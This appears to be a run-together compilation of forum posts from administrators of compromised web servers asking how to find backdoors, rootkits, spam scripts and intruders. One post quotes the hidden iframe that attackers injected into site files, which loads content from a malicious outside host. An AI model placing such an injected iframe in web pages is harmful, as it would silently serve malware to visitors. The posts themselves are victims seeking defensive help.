One of my personal servers has been compromised. It is the tornkit v8 rootkit. I tried to follow the instructions here http://www.webhostgear.com/101.html but I dont have write permissions on /etc/rc.d/rc.sysinit to save changes or even delete the file.
I am logged in as root and the file has rwx permissions for owner which root. But I still cant do anything to that file. I get the following message: cannot remove `rc.sysinit': Operation not permitted.
I need to get this server online asap. I am running centos4.2 and logged in as root in recovery mode.
SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini
- How I can check he has made any backdoor for himself or not? and I have made a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.
My server was hacked some time ago. I've changed passwords and scanned system for viruses, but found nothing.
Now, I'm looking into the log file /var/log/messages and I have few questions:
1. There are a lot of messages like: Apr 2 02:53:09 host sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.196.151.235
Do these messages mean that hacker trying to enter the server under root?
2. There are messages like these: Apr 2 03:56:10 host clamd[4678]: stream 1255: Worm.SomeFool.P.2 FOUND Apr 2 10:46:10 host clamd[4678]: stream 2008: Worm.Bagle.pwd-eml FOUND
What does this mean? Virus on my server or something else?
3. Also, I can see a lot of messages like this one: Apr 2 09:38:40 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND
My server was hacked night before last and here is the log
Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58" Oct 28 10:30:47 server1 [19705]: User root's local password accepted. Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted. Oct 28 10:30:47 server1 [19705]: User root, coming from 3a.76.2d.[url], authenticated.
I have a dedicated server on a web host. I have 3 domains hosted on the same server. One of the domains was apparently hacked and a rogue script was installed that was using the exim service to send out spam. At least that's what I thought was going on.
When I contacted tech support at the web host they confirmed that the emails were being sent through my server and told me that there was no way for them to tell me what script was doing it or where it was located in the domain files. At this point I had them stop the exim service on my server so I knew no more spam would be sent out until I could get this web space cleaned up.
I backed up all of my files and the database from that domain and wiped out every file in the domain space by having the web host delete everything from their end. Then I created a new web space for the domain. I didn't load any programs or files whatsoever. Just the bare minimum to support the domain. Then I created the email accounts.
During this process I made sure that I changed every password on the domain. I didn't even use the same login names except for the email accounts. The email account passwords were also new.
As soon as I had the email accounts turned on there was more spam. What I find curious is that I have several email accounts on this domain but it's only one that all of this spam is being sent through. I don't know enough about the mechanics to know if this really is being sent through my server or if someone is just plugging in my email address in the spam.
I have not done anything with the other two domains on the server. Is it possible that even though these are saying they are from the fresh domain space they could be from a script on one of the others? ..............
I have Windows 2003, all security patches, I run Plesk 8.2 and nothing much else. I use MySQL as a database with port 3306 open so I can connect from the outside (password protected also). I do use strong passwords on my Plesk, administrator etc. I use standard microsoft FTP, Windows 2003 Firewall and connect through Plesk or remote connection.
Somebody has been able to penetrate to my Admin remote desktop :-( I found strange windows open when I connected and in the log there was an indication of the printer driver load. The printer name was one I don't have and my Remote connection has Printers off. The attacker although smart did connect with his printer and that was visable in log. When he terminated the session I found his IP.
I have since changed my administrator password but it doesn't help, he was in again today. He didn't do any harm up to now I think, I checked for viruses and Spyware.
I don't know what to do any more. He can do whatever he wants and if I don't know how he is getting access to my admin account I can not stop him. I blocked today with IPSec the whole IP range of his provider, but as he is smart he can hack another computer and connect to me from him (maybe he has already done that and the IP was from a hacked server). This is no solution. I need to patch the hole.
I use ASP scripts but I don't think one can gain access to the whole admin by them, maybe only get access to my database (if I would make a mistake and wouldn't protect for the injections or some other things).
I am desperate. Plese, if anybody has some ideas what can I do, how do I "catch" him, I mean patch the hole, please let me know.
I had an idea to block all IP's to port 3389 (Remote desktop) except my IP. But I am a little scared to do that not to lock myself out. And even in that case, if he knows admin password he can get in some other way than using remote desktop,
I was on vacation for 2 weeks so I wasn't able to log onto the server. Nor was there any need to log onto the server as the website was up and running and was fine!
However, when I logged into today, there were extra icons on my desktop.
My server was turned into a spam e-mail remailer. There were applications installed that dissected/generated e-mail addresses.
In my system logs in event viewer, starting from January 30th, there is a whole list of failed log on events where the user tried logging on with different usernames and passwords.
I'm guessing they got into my server by brute force.
I was wondering, does anyone know if windows 2003 automatically logs the IPs of users trying to login remotely and where they are stored?
We have a dedicated server with a well known company here in the UK, its running Windows 2003 server std. This runs an application that was developed by our company and accessed by around a max number of users per day of around 50 - max.
Over the last few months the server has got slower and slower, although we do have periods when its really fast, there seems to be nothing we can point our finger at as to why it speeds up and slows down, we checked number of users accessing etc and it does not seem to effect speed (users access by a secure logon)
This week server was nearly at a stand still, I rang hosting company who informed me that they thought our server had been hacked. They said they could see exe files running that they had not installed, mentioned the following -
Dxplay.exe Dameware.exe Tree.exe
They said these exe files were listening to a TCP port (excuse my ignorance, not that techically minded)
They also said two users were accessing our server from Canada and California.
They also said because we had loaded our own software on the server it was not their responsibility if our server was hacked, that we were also running PCAnywhere and this was notorious for allowing a server to be hacked.
I pointed out that we paid them to host the server, it was behind their firewall, would that not stop unauthorised access, the response was no.
I have a few questions I wonder somebody might help me with the answers to,
1, Does it appear our server was hacked? - do the exe files look suspicious?
2, What is our hosting companys responsibility?
3, Is PCA secure
4, How can we stop this in future?
I am also told by our guys there is evidence of someone using our server to surf the web, could this be internal, i.e our hosting company, or maybe a hacker?
We can see when users are logged into our application, but nothing else, is there some reporting software we can install to let us view who is accessing our server?
What can we do to make the server more secure?
We are currently scanning it with spyware software and although we have anti virus we are scanning again, this new scan picked up 7 virus, I'm not sure yet what these were.
basically every index.htm/html/php in all my accounts (/home/*) have been replaced by some hack page.
i have backups, so not too concerned. problems though are:
1) opening any subfolder in an account causes an endless loop 2) putting any other page and trying to load it from the home directory yields a 500 error message
most likely going ot have to rebuild the entire server... but any ideas what i could look for first?
for e.g. the loop thing is nearly like there's some "global .htaccess file" that's controling every single domain to keep reloading a subfolder called index, which does not exist...
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
I am running not so big hosting and do not have much customers. One of our customers have complied to me, that registration mails from his website goes to spam. I searched my IP and found it blacklisted in two databases.
I started to analyze logs, and noticed that from 25th of April something started to happen. Tons of mails are sent, but I do not have such many customers. My mail server is in .lv zone and I have customers witth .lv domains, but mostly some .es mail addresses are there in maillog.
My hosting provider will shut down my server because it was used by a hacker for DoS attacks.
((outging 2090kbits/sec, incoming 29kbits/sec )
Server got Freebsd 6.2 , apache 2.2, php4.4.7 ,ipfw installed
To be more specific, somehow the hacker can upload a script "udp.pl" into the /tmp directory and then execute it through "perl udp.pl".
The script "udp.pl" does mass flooding on the IP they specify.
The header of udp.pl code is attached at the bottom.
After I deleted "udp.pl"
secured /tmp (noexec,nosuid,rw)
chkrootkit/ rootkit hunter, Checked /etc/passwd for new users and users with UIDs of 0 other than root. Checked for the presence of SUID/SGID root files. nothing found.
installed mod_security2 installed Suhosin
Currently Still have lots of outgoing traffic via port 80 (outging 390kbits/sec, incoming 19kbits/sec )
find nothing suspicius process by using "lsof, top" .....
My server was recently hacked and I'm looking ways to secure it in the future. I use the server to host my own websites.
It was hacked to be a spam server. I traced the new files the hackers added to my "upload" directory, which is where my site members upload pics. I had set the directory to chmod 777. Could someone hack that directory solely from it being its rights being 777?
The site was custom developed in PHP, and looking through it myself, I couldn't find any security issues. But then again, I may not know what exactly to look up.
I would appreciate any general tips to protecting a server, as well as general tactics hackers use to hack a server and PHP site.
we are looking for a suggestion on a best practice to help a customer recover from being hacked. One thought is that the client should be put on a new server and allowed to rebuild from there. The concern is that there are so many web app breaches that the server often gets rehacked because the bad code is still in the web app.
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code: <iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden">< /iframe> The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
I am renting a cheap Linux server merely to test and learn as much as possible.
The server itself is completely unsecured, as I am doing everything one at a time to learn as much as possible.
Now, a few days ago I noticed someone with a US based IP had logged into my root account. The bash log mentioned something about some network commands and I traced the IPs to my server datacenter, so no big deal I thought, but I changed the root password anyways.
Today it happened again, but this time the bash log was cleared, and in my /var/www/html folder I found a suspicious folder with eBaywhateverapi.dll in it. I deleted it, seeing as this was not normal, which led me to the conclusion my server was hacked. Since it's a cheap test server, it's no loss at all, I'm just glad it's not the server I use for my customers!
So, what I did now was this:
Removed all suspicious folders in /home Turned off root login (made a new account which I use to su into root) Changed the SSH port Changed root password
Will this be enough for now, or should I do anything else?
my server was hacked by Cold he/she inserted a couple of scripts that enabled remote access into a 777 permission folder.
i found the following script names: back.pl cpanel.php cgitelnet.pl cpanel.pl gcc-cold <- shell script
i have deleted all the above files, and changed the folder chmod to 755
but the weird thing is, through shell, when i try to locate the file gcc-cold i get this:
Quote:
root@ [/tmp]# locate gcc-cold /home/ns5f6/public_html/uploads/gcc-cold root@ [/tmp]# rm /home/ns5f6/public_html/uploads/gcc-cold rm: cannot lstat `/home/ns5f6/public_html/uploads/gcc-cold': No such file or directory
isn't locate NOT supposed to find that file after its been deleted? and if it was not deleted some how, isn't it supposed to delete it? am i missing something here??????
from a bit of researching the files, i found that it was a telnet script, BUT i have telnet disabled, and there's no process running along side GREP TELNET
how can i find malicious software or shell scripts that allow such hacking activities on the server?